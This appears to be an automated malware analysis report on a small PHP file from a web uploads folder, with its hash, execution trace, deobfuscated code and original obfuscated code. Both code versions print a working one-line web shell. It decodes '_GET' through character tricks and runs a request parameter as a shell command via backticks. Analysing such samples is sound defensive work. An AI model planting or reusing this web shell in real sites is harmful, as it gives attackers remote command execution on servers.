PHP Malware Analysis

00000000ax.php

md5: bacd225c8ed40f1094d723b7b1b5dcb4

Attributes

Input


Deobfuscated PHP code

<?php

echo $_ = "";
$_ = "'";
$_ = "_GET";
$_ = $_GET['0'];
echo `{$_}`;

Execution traces

data/traces/bacd225c8ed40f1094d723b7b1b5dcb4_trace-1676237163.001.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:26:28.898821]
1	0	1	0.000155	393528
1	3	0	0.000222	395872	{main}	1		/var/www/html/uploads/00000000ax.php	0	0
1		A						/var/www/html/uploads/00000000ax.php	1	$_ = ''
1		A						/var/www/html/uploads/00000000ax.php	1	$_ = '\''
2	4	0	0.000264	395872	chr	0		/var/www/html/uploads/00000000ax.php	1	1	120
2	4	1	0.000277	395912
2	4	R			'x'
2	5	0	0.000291	395872	ord	0		/var/www/html/uploads/00000000ax.php	1	1	TRUE
2	5	1	0.000304	395912
2	5	R			49
2	6	0	0.000316	395872	chr	0		/var/www/html/uploads/00000000ax.php	1	1	96
2	6	1	0.000328	395912
2	6	R			'`'
2	7	0	0.000341	395904	chr	0		/var/www/html/uploads/00000000ax.php	1	1	98
2	7	1	0.000352	395944
2	7	R			'b'
2	8	0	0.000364	395904	chr	0		/var/www/html/uploads/00000000ax.php	1	1	115
2	8	1	0.000375	395944
2	8	R			's'
1		A						/var/www/html/uploads/00000000ax.php	1	$_ = '_GET'
1		A						/var/www/html/uploads/00000000ax.php	1	$_ = NULL
2	9	0	0.000428	395872	shell_exec	0		/var/www/html/uploads/00000000ax.php	1	1	''
2	9	1	0.000455	395904
2	9	R			FALSE
1	3	1	0.000469	395872
			0.000493	314272
TRACE END   [2023-02-12 19:26:28.899193]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>